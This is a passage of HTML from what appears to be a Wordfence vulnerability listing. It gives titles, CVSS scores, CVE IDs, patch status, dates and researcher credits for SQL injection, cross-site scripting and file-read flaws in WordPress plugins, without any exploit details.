<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ayoub-mouhatta" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bdc5de72b0d9bfc9378c752c2c025793.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdc5de72b0d9bfc9378c752c2c025793"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ayoub-mouhatta" target="_blank" rel="noopener">Ayoub MOUHATTA</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/942be1b2-0227-49e3-9e99-63b3de48fb22" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/50bbda9c-e41e-48f5-9127-e938c9219a14" target="_blank" rel="noopener">eShipper Commerce &lt;= 2.16.13 &#8211; Authenticated (Subscriber+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74013" target="_blank" rel="noopener noreferrer">							CVE-2026-74013						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/eshipper-commerce" target="_blank" rel="noopener">eShipper Commerce</a> <span class="wfvr-software-slug">[eshipper-commerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hivesec" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4ee838051f5b349d62b3dc49551eb17c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ee838051f5b349d62b3dc49551eb17c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hivesec" target="_blank" rel="noopener">hivesec</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/50bbda9c-e41e-48f5-9127-e938c9219a14" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3b21b238-f2c2-415d-bd61-191d7721b70d" target="_blank" rel="noopener">License Manager for WooCommerce &lt;= 3.0.18 &#8211; Authenticated (Customer+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73345" target="_blank" rel="noopener noreferrer">							CVE-2026-73345						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/license-manager-for-woocommerce" target="_blank" rel="noopener">License Manager for WooCommerce</a> <span class="wfvr-software-slug">[license-manager-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rootdirectivesec" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ee3df505694b12524f5722a72a35112b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ee3df505694b12524f5722a72a35112b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rootdirectivesec" target="_blank" rel="noopener">rootdirective.sec</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3b21b238-f2c2-415d-bd61-191d7721b70d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/46d537b7-7d07-4d2b-83d7-484c240b6e72" target="_blank" rel="noopener">Persistent Login &lt;= 3.1.0 &#8211; Authenticated (Subscriber+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66594" target="_blank" rel="noopener noreferrer">							CVE-2026-66594						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-persistent-login" target="_blank" rel="noopener">Persistent Login</a> <span class="wfvr-software-slug">[wp-persistent-login]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/46d537b7-7d07-4d2b-83d7-484c240b6e72" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a46f270f-d9cb-4bc1-8e10-3fc6646e1d78" target="_blank" rel="noopener">WebToffee WooCommerce PDF Invoices, Packing Slips, Delivery Notes &amp; Shipping Labels &lt;= 4.9.8 &#8211; Authenticated (Subscriber+) Arbitrary File Read via &#8216;customer_note&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18027" target="_blank" rel="noopener noreferrer">							CVE-2026-18027						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/print-invoices-packing-slip-labels-for-woocommerce" target="_blank" rel="noopener">WebToffee WooCommerce PDF Invoices, Packing Slips, Delivery Notes &amp; Shipping Labels</a> <span class="wfvr-software-slug">[print-invoices-packing-slip-labels-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a46f270f-d9cb-4bc1-8e10-3fc6646e1d78" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/df6f4e7a-3cec-4964-ad3a-c3c2d549f8a5" target="_blank" rel="noopener">WP Project Manager Pro &lt;= 4.0.1 &#8211; Authenticated (Subscriber+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78470" target="_blank" rel="noopener noreferrer">							CVE-2026-78470						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wedevs-project-manager-business" target="_blank" rel="noopener">WP Project Manager Pro</a> <span class="wfvr-software-slug">[wedevs-project-manager-business]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/df6f4e7a-3cec-4964-ad3a-c3c2d549f8a5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/73b2d6bb-8e98-42f5-8435-7f0cc8be7d7e" target="_blank" rel="noopener">WP w3all phpBB &lt;= 3.0.5 &#8211; Authenticated (Subscriber+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73998" target="_blank" rel="noopener noreferrer">							CVE-2026-73998						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-w3all-phpbb-integration" target="_blank" rel="noopener">WP w3all phpBB</a> <span class="wfvr-software-slug">[wp-w3all-phpbb-integration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/khanh-nguyen-bluerock" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/04ed824b51db674c6f1cb3422c3edf88.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="04ed824b51db674c6f1cb3422c3edf88"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/khanh-nguyen-bluerock" target="_blank" rel="noopener">Khanh Nguyen</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/73b2d6bb-8e98-42f5-8435-7f0cc8be7d7e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c1818f01-8cb8-430f-adc4-399e45933180" target="_blank" rel="noopener">YITH WooCommerce Membership Premium &lt;= 2.33.0 &#8211; Authenticated (Subscriber+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-32552" target="_blank" rel="noopener noreferrer">							CVE-2026-32552						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/UNKNOWN-CVE-2026-32552" target="_blank" rel="noopener">YITH WooCommerce Membership Premium</a> <span class="wfvr-software-slug">[yith-woocommerce-membership-premium]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c1818f01-8cb8-430f-adc4-399e45933180" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5990fee6-8972-460e-ad65-76e2a5ea57c1" target="_blank" rel="noopener">Admin and Site Enhancements (ASE) &lt; 9.0.1 &#8211; Authenticated (Author+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19615" target="_blank" rel="noopener noreferrer">							CVE-2026-19615						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/admin-site-enhancements" target="_blank" rel="noopener">Admin and Site Enhancements (ASE)</a> <span class="wfvr-software-slug">[admin-site-enhancements]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mohammed-abd-alrahman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6850e6e9fde2fb4afa5c90fd6bb8b6c9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6850e6e9fde2fb4afa5c90fd6bb8b6c9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mohammed-abd-alrahman" target="_blank" rel="noopener">Mohammed Abd Alrahman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5990fee6-8972-460e-ad65-76e2a5ea57c1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/54d6effe-f1f6-4692-88c1-ca408190aa7b" target="_blank" rel="noopener">Draft List &lt;= 2.6.4 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66603" target="_blank" rel="noopener noreferrer">							CVE-2026-66603						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-draft-list" target="_blank" rel="noopener">Draft List</a> <span class="wfvr-software-slug">[simple-draft-list]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/v1t" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/efd10eb3421a6ca0a3d855ad7029a801.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="efd10eb3421a6ca0a3d855ad7029a801"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/v1t" target="_blank" rel="noopener">V1T</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/54d6effe-f1f6-4692-88c1-ca408190aa7b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d0d16797-b795-4623-a22b-f277e602fe53" target="_blank" rel="noopener">Easy Media Replace &lt;= 0.2.0 &#8211; Authenticated (Author+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15253" target="_blank" rel="noopener noreferrer">							CVE-2026-15253						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-media-replace" target="_blank" rel="noopener">Easy Media Replace</a> <span class="wfvr-software-slug">[easy-media-replace]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/testoun" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6354b317fcf2c6bde1d3a0b7e8bd25f0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6354b317fcf2c6bde1d3a0b7e8bd25f0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/testoun" target="_blank" rel="noopener">testoun</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d0d16797-b795-4623-a22b-f277e602fe53" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e8af1fdb-7fec-4bbe-937b-ee2e76cf5c5b" target="_blank" rel="noopener">EWWW Image Optimizer &lt;= 8.7.3 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;data-script&#8217; Lazy Load Attribute in Post Content</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15446" target="_blank" rel="noopener noreferrer">							CVE-2026-15446						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ewww-image-optimizer" target="_blank" rel="noopener">EWWW Image Optimizer</a> <span class="wfvr-software-slug">[ewww-image-optimizer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/uko-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5a50351dc3a5975487697a55ad3936d5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5a50351dc3a5975487697a55ad3936d5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/uko-2" target="_blank" rel="noopener">UKO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e8af1fdb-7fec-4bbe-937b-ee2e76cf5c5b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b4c29cff-0926-4e65-b439-6fc098a0fac8" target="_blank" rel="noopener">Featured Video Plus &lt;= 2.3.3 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66637" target="_blank" rel="noopener noreferrer">							CVE-2026-66637						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/featured-video-plus" target="_blank" rel="noopener">Featured Video Plus</a> <span class="wfvr-software-slug">[featured-video-plus]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b4c29cff-0926-4e65-b439-6fc098a0fac8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d7285cfb-faba-4769-8f2e-9e14e6af604d" target="_blank" rel="noopener">Frontend Admin by DynamiApps &lt;= 3.29.10 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66638" target="_blank" rel="noopener noreferrer">							CVE-2026-66638						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-frontend-form-element" target="_blank" rel="noopener">Frontend Admin by DynamiApps</a> <span class="wfvr-software-slug">[acf-frontend-form-element]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d7285cfb-faba-4769-8f2e-9e14e6af604d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/35411f6a-bb1f-4b20-b9ed-66f21c9f7278" target="_blank" rel="noopener">GeoDirectory – WP Business Directory Plugin and Classified Listings Directory &lt;= 2.8.177 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-68565" target="_blank" rel="noopener noreferrer">							CVE-2026-68565						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/geodirectory" target="_blank" rel="noopener">GeoDirectory – WP Business Directory Plugin and Classified Listings Directory</a> <span class="wfvr-software-slug">[geodirectory]</span></div>
</p></div>
